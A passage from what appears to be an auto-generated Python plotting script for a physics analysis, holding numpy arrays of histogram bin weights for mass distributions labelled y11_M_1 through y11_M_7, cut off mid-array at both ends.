84322160493,7.93740536241,8.0602282597,7.90670038809,7.86064142661,8.0602282597,7.87599391377,7.96811183674,7.41541029893,7.32329237596,7.61499563203,7.18511699151,6.84735627396,6.98553165841,6.87806124828,6.61706296654,7.15441201718,7.01623663273,6.47888758209,6.46353509492,6.46353509492,6.70918088951,6.27930074899,6.35606618479,6.75523835099,5.78801065983,6.44818260776,6.21789080034,5.52701387808,5.97224500576,6.03365645441,5.91083355712,5.51166139092,5.80336464699,4.94360586595,5.15854518621,5.31207455782,5.23531062202,5.57307133957,4.5290812126,5.21995663486,5.38883849363,5.20460414769,4.62119763556,4.82078446866,4.51372722543,4.98966482744,4.54443369976,4.39090582814,4.3294943795,4.92825337879,4.23737645653,3.96102568763,4.14526003356,4.36019935382,4.23737645653,4.16061252072,3.96102568763,4.09920107208,3.88426175182,4.02243713627,3.57720600859,3.83820429033,3.59255849575,3.91496822614,3.27015026537,3.43903062414,3.3776191755,3.62326497008,3.80749781601,3.70002890588,3.34691420117,3.50044207279,3.14732736807,3.34691420117,2.90168157349,2.96309302214,3.07056343227,2.96309302214,3.20873881672,3.11662089375,2.80956515053,2.90168157349,2.67138976607,2.82491763769,2.91703556065,2.56392085594,2.64068479175,2.73280121472,2.65603727891,2.87097659917,2.5025094073,2.90168157349,2.73280121472,2.36433402285,2.67138976607,2.53321438162,2.60997831743,2.64068479175,2.31827506136,2.1033357411,2.47180293298,2.5025094073,2.14939470259,2.21080465123,2.11868822827,2.37968651001,2.19545216407,2.0265718053,1.9805128
4381,2.07263076678,1.79627999788,1.8269849722,1.91910139517,1.88839642084,1.79627999788,1.94980786949,1.91910139517,1.79627999788,1.96516035665,1.75022103639,2.19545216407,1.76557352355,1.85768994652,1.53528171613,1.84233745936,1.68880958775,1.84233745936,1.50457524181,1.41245896884,1.5506342033,1.41245896884,1.3510476702,1.50457524181,1.41245896884,1.09004983846,1.50457524181,1.44316469317,1.50457524181,1.24357801007,1.53528171613,1.18216671142,1.18216671142,1.13610834994,1.19751964858,1.30498930871,1.28963652155,1.07469705129,1.16681392426,1.05934426413,0.997932965487,1.09004983846,1.01328575265,0.982580178326,1.02863868981,0.875110518196,1.13610834994,0.997932965487,1.02863868981,0.844404793874,0.967227391164,0.936521666842,0.875110518196,0.967227391164,1.05934426413,0.905816092519,0.79834643239,0.967227391164,1.02863868981,0.936521666842,0.767640708067,0.813699219551,0.79834643239,0.859757581035,0.92116887968,0.859757581035,0.675523835099,0.997932965487,0.79834643239,0.629465473615,0.905816092519,0.583406962131,0.69087662226,0.69087662226,0.736935133744,0.675523835099,0.706229559422,0.552701387808,0.445231577679,0.537348600647,0.813699219551,0.767640708067,0.736935133744,0.583406962131,0.552701387808,0.844404793874,0.445231577679,0.614112536454,0.583406962131,0.706229559422,0.675523835099,0.629465473615,0.521995663486,0.644818260776,0.46058451484,0.614112536454,0.537348600647,0.506642876324,0.475937302002,0.475937302002,0.506642876324,0.322409130388,0.506642876324,0.399173216195,0.56805417497,0.521995663486,0.552701387808,0.506642876324,0.399173216195,0.475937302002,0.368467491872])
# Creating weights for histo: y11_M_1
y11_M_1_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0456393516902,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0454653083971,0.0,0.0,0.0,0.0456575075017,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0454926924109,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_2
y11_M_2_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.150581618448,0.0375576091651,0.0751699471544,0.0376123379893,0.0752395977957,0.113054984062,0.112880276391,0.0376386487322,0.112913900838,0.0752883609922,0.15055592751,0.075489952726,0.112939870688,0.0376527338118,0.112912025927,0.112999914344,0.0,0.11300394308,0.0376278486216,0.0753477383576,0.0376714984228,0.037570144731,0.0,0.150605759871,0.0753774115452,0.112882290759,0.150437467187,0.0376527338118,0.0753521389765,0.112917666157,0.0752611980169,0.113140827121,0.0377612617521,0.113039783332,0.0,0.0376376260531,0.0376527338118,0.0,0.0376123379893,0.0,0.037570144731,0.0753847097547,0.0,0.0376161497931,0.0,0.0,0.0376333648904,0.075310937407,0.112882166798,0.0,0.0376333648904,0.0,0.0753373101303,0.0375985628125,0.0375576091651,0.0376722886748,0.0,0.0375576091651,0.0,0.0376018477815,0.0,0.0,0.0,0.0375985628125,0.0,0.0376278486216,0.0,0.0,0.0,0.0,0.0375690600714,0.0,0.0,0.0,0.0,0.0,0.0752743998737,0.0376216660619,0.0377193009208,0.0,0.0,0.0377049524238,0.0,0.0753316389101,0.0377635860226,0.0754419023058,0.0377132113319,0.0376386487322,0.0,0.0,0.0,0.0377132113319,0.0376216660619,0.0377612617521,0.0,0.0,0.0,0.0,0.0,0.0,0.0375985628125,0.0,0.0,0.0,0.0,0.0376278486216,0.0,0.0,0.0,0.0,0.0,0.0377132113319,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_3
y11_M_3_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.639083964131,0.928246730447,0.763007447063,0.68070948531,0.701789842779,0.82473922127,0.474546237042,0.474398156104,0.474919791013,0.495310322879,0.495156605115,0.515701768825,0.597953417198,0.432896949787,0.288746402938,0.453649457279,0.350561663106,0.494891521955,0.494913155178,0.598298482347,0.20647860582,0.267936156068,0.288739699686,0.556943376461,0.309422737108,0.47445239151,0.309268409958,0.206364345837,0.412389415699,0.330031429368,0.206446917718,0.144384368478,0.226784889992,0.206406698204,0.185568114859,0.350722236469,0.288789059998,0.26816894174,0.24727155259,0.144233271077,0.18587219876,0.206343017307,0.164989891928,0.206124247527,0.144496328027,0.144468113428,0.123582668255,0.144397058953,0.123615788415,0.164996290487,0.144340660226,0.12363170864,0.185656018872,0.123824945123,0.0619013360217,0.288796372637,0.0825645531455,0.123696532137,0.0824036750895,0.123832760506,0.0825449156631,0.144281092688,0.0618964456945,0.0,0.0619324909104,0.103150088715,0.0412825279447,0.0618873658345,0.0412562176793,0.0825484653399,0.0206336771095,0.103119619387,0.0618538495728,0.0619529053607,0.0413161356144,0.061870226837,0.020686130059,0.0206582353885,0.0412554407114,0.103153668862,0.0412747125619,0.144340690695,0.0412292523233,0.0824829867523,0.0618313327388,0.0,0.0206341189148,0.0,0.0206582353885,0.04125141876,0.0206783146762,0.0619201051283,0.0412049530336,0.0825051379543,0.0,0.0206336771095,0.0206099262677,0.0413025462937,0.0205802339068,0.0618851415735,0.0,0.0413133781401,0.0,0.0412139110163,0.0412264491451,0.0,0.0413017236218,0.0,0.0206099262677,0.0,0.0,0.0,0.0,0.0,0.0206579154605,0.0206173150799,0.0206579154605,0.0206551427516,0.0206041066259,0.0206242316176,0.0206099262677,0.0206213217967,0.0,0.0,0.0,0.0205802339068,0.0,0.04129159257,0.0,0.0206099262677,0.0205963978857,0.0,0.0206141462697,0.020567787186,0.0,0.0,0.0,0.0,0.0206389025994,0.0,0.0206173150799,0.0206551427516,0.0,0.0,0.0,0.0,0.0205963978857,0.0,0.020686130059,0.0,0.0,0.0,0.0,0.0,0.0206022175275,0.0,0.0,0.0,0.0205802339068,0.0206551427516,0.0,0.0206434882334,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0206389025994,0.0206099262677,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0205307974208,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.020661480372,0.0,0.0,0.0,0.0,0.0,0.0,0.0206141462697,0.0206141462697,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0206022175275,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0206783146762,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0206099262677,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_4
y11_M_4_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.706920038114,0.684670875982,0.636500908617,0.743904773985,0.554988988799,0.540266492104,0.514292927763,0.49965941509,0.477395672806,0.433024962452,0.451498917309,0.458907588729,0.340428068477,0.381190867529,0.418196045676,0.370048624939,0.362659193307,0.325724360637,0.351577676299,0.277592121296,0.30340695738,0.247976374781,0.24423378496,0.199783560167,0.255310942953,0.188743679264,0.203465725027,0.188741725223,0.155442461051,0.185032053478,0.192375790612,0.122099245986,0.151718810397,0.148041169893,0.162834447967,0.173974135273,0.155428482142,0.103697650772,0.133222429161,0.118410587697,0.155435396441,0.118415788453,0.0962473131844,0.118425904373,0.107315212029,0.0851176516117,0.114684562132,0.10360826091,0.0851083022769,0.0924792306432,0.0813732730914,0.0925449465463,0.0665999713292,0.0629515963479,0.0703299801323,0.0407069886346,0.0925549271866,0.0776845997716,0.036997632542,0.0555055576505,0.0555117203953,0.0480980736857,0.0629194147952,0.0369826766126,0.0518260382614,0.0554705652849,0.0480886942888,0.048088904724,0.0370184956878,0.0370183604081,0.0444055824704,0.0333131078017,0.0480880479521,0.0481394993556,0.0517900688753,0.029603030217,0.0370032090745,0.0370205699775,0.0406853589035,0.033291553226,0.025915379011,0.011099558819,0.0444011332693,0.0148005756657,0.0333250424831,0.0295813553927,0.0185057906944,0.0111155834586,0.0184950434687,0.0259080438416,0.0148050263699,0.00741279444702,0.0111143178413,0.0184932247074,0.0111079596924,0.0296112221583,0.0259137556538,0.00740316553405,0.0074017390841,0.0,0.0148147319414,0.0,0.0222242556244,0.0148051391031,0.0222107426791,0.00739276402333,0.0185131408949,0.00739530577978,0.00740231176843,0.00740338047857,0.0147981511517,0.0111070548211,0.0073963023407,0.00740875860073,0.0111136504611,0.00370418840559,0.0185067376527,0.0147918140463,0.00740316553405,0.00740225915964,0.00740635663337,0.00738164703296,0.0111010348716,0.014797712244,0.0,0.0037047926552,0.00369276327798,0.0037047926552,0.00370835502231,0.0037071480262,0.00740516316523,0.00741115004634,0.0110984299846,0.00369801664214,0.0,0.0037071480262,0.00740210884879,0.00740371867798,0.0,0.0036982571395,0.00370400202014,0.00369858932648,0.0,0.00369887491709,0.01110931249,0.0,0.0,0.0,0.00368965785585,0.00370835502231,0.0,0.0,0.00369082276492,0.0,0.0,0.0,0.00369920860717,0.0,0.0,0.0,0.00369801664214,0.00370448301485,0.0,0.0,0.0,0.0,0.0,0.0,0.00370564792393,0.0036986825192,0.0,0.0,0.0,0.0,0.0036982571395,0.0,0.0036982571395,0.0,0.0,0.0,0.0,0.00369082276492,0.0,0.0,0.0,0.0,0.0,0.0037071480262,0.0,0.0,0.00739530577978,0.0,0.00369082276492,0.0,0.0,0.0,0.0,0.0,0.0,0.0037071480262,0.0,0.0,0.0,0.00741283803717,0.00370664448486,0.0,0.0,0.0,0.0,0.0,0.0,0.0036982571395,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00370503615878,0.0,0.0,0.0,0.0,0.0,0.00370448301485,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00738812092121,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00370400202014,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00740338047857,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00369920860717,0.0,0.0,0.0,0.00370047873384,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00369662927301,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0
.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_5
y11_M_5_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.234428163505,0.232542884632,0.234429663925,0.207967190479,0.225926178465,0.177708952216,0.185281426502,0.168241446322,0.172027458402,0.176770889064,0.134211570012,0.144621355241,0.123853084174,0.129495927145,0.126645922641,0.122896175735,0.13233445343,0.106801460728,0.11628664158,0.10399753415,0.110608718767,0.0954529821693,0.105861927163,0.0926448994254,0.0897881130187,0.0917062361047,0.074667141173,0.0879274560536,0.0680470290507,0.0907232053377,0.0841319313052,0.0586208447485,0.0661726432343,0.0519958712624,0.0586053003879,0.0708921271785,0.0567222571428,0.0415973992069,0.0557572464309,0.0415977743122,0.0416020355075,0.0548187181481,0.0406482329399,0.0368592200182,0.0387651746906,0.0396910694293,0.0415993497541,0.0463184585931,0.0349657938605,0.0264720761406,0.0311933155772,0.0330867267308,0.031200547606,0.0302403682495,0.0340351427874,0.0302612090959,0.0170193493925,0.0283549843478,0.0189121903861,0.0226800473729,0.0236269480044,0.0264623684173,0.0217419842206,0.0160778952889,0.0208011152811,0.0264682050546,0.012287530488,0.0179678554743,0.0170266114297,0.0207943033702,0.0226945414389,0.0113533459237,0.0198630221204,0.014177774253,0.0113517659805,0.0151232374813,0.0160725687947,0.0132332998021,0.0103933076067,0.0113504531122,0.00850323939096,0.0113445339517,0.0141818734029,0.0132300063782,0.0103986956182,0.00755748057978,0.00850647429844,0.00567068328159,0.00567507051232,0.00661908583441,0.00756755890702,0.0113422923229,0.0132329201956,0.00189050633868,0.00662716710143,0.00472418326247,0.00283596806652,0.00567575470426,0.012285690972,0.00756355278319,0.00472793581516,0.00756516423525,0.00473093965782,0.00662147150366,0.00189103448684,0.00756052943506,0.00472463789001,0.00661767994002,0.00850615620921,0.0047309666654,0.0047265029132,0.00756043340812,0.000945468929865,0.00283296872512,0.00189033379027,0.00378353038364,0.00377934570972,0.00850716149122,0.00283495528241,0.00283767854636,0.00283646920711,0.00283500929756,0.0066170542645,0.000946217339815,0.00283574750465,0.00472847446627,0.00188769605031,0.00188946354615,0.00379018324995,0.00189380726468,0.00472581572042,0.00378232854649,0.00378154982804,0.0,0.000944141057361,0.00189103598726,0.000945699694601,0.00189238636608,0.000943554992954,0.00189200976043,0.00567003509975,0.00283695984474,0.000943313725272,0.00188900441735,0.00283594105895,0.0,0.0,0.000945826780252,0.000946686221349,0.00189135407649,0.0,0.00283287569903,0.00283414055385,0.0,0.00189074790644,0.0,0.00189049133447,0.00378125574554,0.000945699694601,0.00189050633868,0.0,0.0,0.0,0.000944843104304,0.0,0.000945308834954,0.000946686221349,0.000943313725272,0.0,0.0,0.0,0.000946146219864,0.000946217339815,0.000946344125382,0.000945699694601,0.0,0.0,0.0,0.000945699694601,0.000946344125382,0.0,0.0,0.000945182499514,0.000945066967104,0.0,0.0,0.0,0.00189087544222,0.0,0.0,0.000945554153773,0.0,0.000945554153773,0.0,0.0,0.0,0.0,0.000945308834954,0.00189009372293,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000944843104304,0.0,0.000945323238995,0.0,0.0,0.0,0.000943313725272,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000943667674564,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000945323238995,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000944843104304,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_6
y11_M_6_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0794569059656,0.0826610287245,0.0719270975169,0.0612219204882,0.0783703579018,0.0600922973898,0.0762107953576,0.0601378467083,0.0633715109182,0.0515695512873,0.0590239690533,0.0654559077146,0.052608638086,0.0526060888237,0.0461327246506,0.0365679038641,0.044006827364,0.0654584569769,0.0386108264128,0.0429456219663,0.0439660016786,0.0247013166859,0.0332740883114,0.0300700180374,0.0408284596519,0.0236093476908,0.0300557534154,0.0418989623591,0.0311343350347,0.0289729617645,0.0343839771207,0.024697822697,0.0257659710855,0.0203976483745,0.0193503851919,0.0278882544179,0.0204008499479,0.0225694886156,0.0193338262339,0.0117965049594,0.0268579813187,0.0193561472745,0.0118157631363,0.0161048369212,0.0107543065612,0.0182354203516,0.0128805187566,0.0107341261512,0.0193544602627,0.0107319217891,0.0107283678176,0.0139634003815,0.0118177650569,0.0171824625671,0.0139549240845,0.00861776610463,0.00860400758621,0.00750732245592,0.0117995978143,0.0128784868446,0.00859474026808,0.0107478621761,0.0128910269657,0.00966803591705,0.0150368272425,0.0128866032458,0.00965413868876,0.00535905914185,0.00858865577887,0.00322295093522,0.00753151420507,0.00642868835185,0.00536710431366,0.00428542983944,0.00215147463475,0.00537555061938,0.00752314662657,0.0064202607907,0.00537099193862,0.00214157150061,0.00644828768,0.00322436277664,0.00857959839998,0.00537405855117,0.00321525328784,0.00537818235778,0.00644348157084,0.00322272562542,0.00107318917978,0.00107368216211,0.00537222158277,0.00214070887525,0.00429184048426,0.00107368216211,0.00428935495355,0.00429190046691,0.00321814557584,0.00106790583373,0.00213896450505,0.00429435975521,0.00430528409382,0.00643557885781,0.00215087930703,0.00107558661099,0.00322245795288,0.0,0.00107418864054,0.00535821188704,0.00323148496555,0.00215041481645,0.00213846552445,0.00322867177966,0.00214977525153,0.00214492940387,0.00214399779847,0.00107673265433,0.00320801638213,0.00107914770544,0.00323316672887,0.00107914770544,0.0,0.00106675866571,0.0,0.00214617441858,0.00107673265433,0.0,0.00107418864054,0.0,0.00214357154682,0.00107368216211,0.00107673265433,0.00106337751918,0.00215047554887,0.00215282986756,0.0,0.0,0.00107673265433,0.0,0.00107418864054,0.0,0.0,0.0,0.00107414777737,0.00106337751918,0.00107368216211,0.00107674427597,0.0,0.0,0.0,0.00107728636909,0.0,0.0,0.0,0.00107914770544,0.00106702671313,0.00107418864054,0.00215041481645,0.0,0.0,0.00214569718168,0.0,0.0,0.00107368216211,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00106841081259,0.0,0.00106484109563,0.0,0.0,0.0,0.00107418864054,0.00215047554887,0.0,0.00107414777737,0.0,0.0,0.00106675866571,0.0,0.00106337751918,0.0,0.0,0.0,0.00106675866571,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00107414777737,0.0,0.0,0.0,0.0,0.00106484109563,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_7
y11_M_7_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00664096320013,0.00728546549738,0.00688624248943,0.00671720033271,0.00469719056492,0.00486045234741,0.00623132043113,0.00542581946692,0.00510287759658,0.00404886926023,0.00493458195366,0.00518407472402,0.00534509067867,0.00421271253768,0.00429422241511,0.00380678190679,0.00388909330429,0.00356456410987,0.00380754570827,0.00363901432415,0.00388745568876,0.00186326701529,0.00226819181707,0.00266650172076,0.00267324077588,0.00299780140246,0.00145810820108,0.00267322977462,0.00315796711718,0.00210634133857,0.00299697002183,0.00194401937766,0.00259250884441,0.00234050621607,0.00129545793127,0.00153926760993,0.00170060087224,0.00259297404038,0.00105379051148,0.000971216183951,0.00162023826865,0.00153914156697,0.00129673706302,0.00129543907197,0.00161962848474,0.00105292235522,0.00121449324466,0.0020998081641,0.00129555835702,0.00129595251631,0.000890782229361,0.00153916734134,0.00121530105117,0.00128977688266,0.00145832979781,0.000891275242792,0.00129652536742,0.00121461394415,0.00129571646079,0.000728884602619,0.00097209392702,0.000891243339149,0.00137653844539,0.000642140956222,0.00105261039103,0.000972061080413,0.000728783705385,0.000486287262374,0.000560755707308,0.0010531745983,0.000972496258669,0.00056660083179,0.000566020594116,0.000648223550673,0.000405244309683,0.00064782624817,0.000405030099512,0.00072909504093,0.000485973097934,0.000648141041253,0.000810173040479,0.000810204472639,0.000405381982544,0.000405213977649,0.000486069437505,0.000405222935814,0.000324596930727,0.000324103131492,0.000404892583812,0.000243142059579,0.000486002958486,0.000404963306172,0.000161947918198,0.000648002896909,0.000324025494057,8.11512364819e-05,8.09765522524e-05,0.000567242676498,0.000323932140542,0.0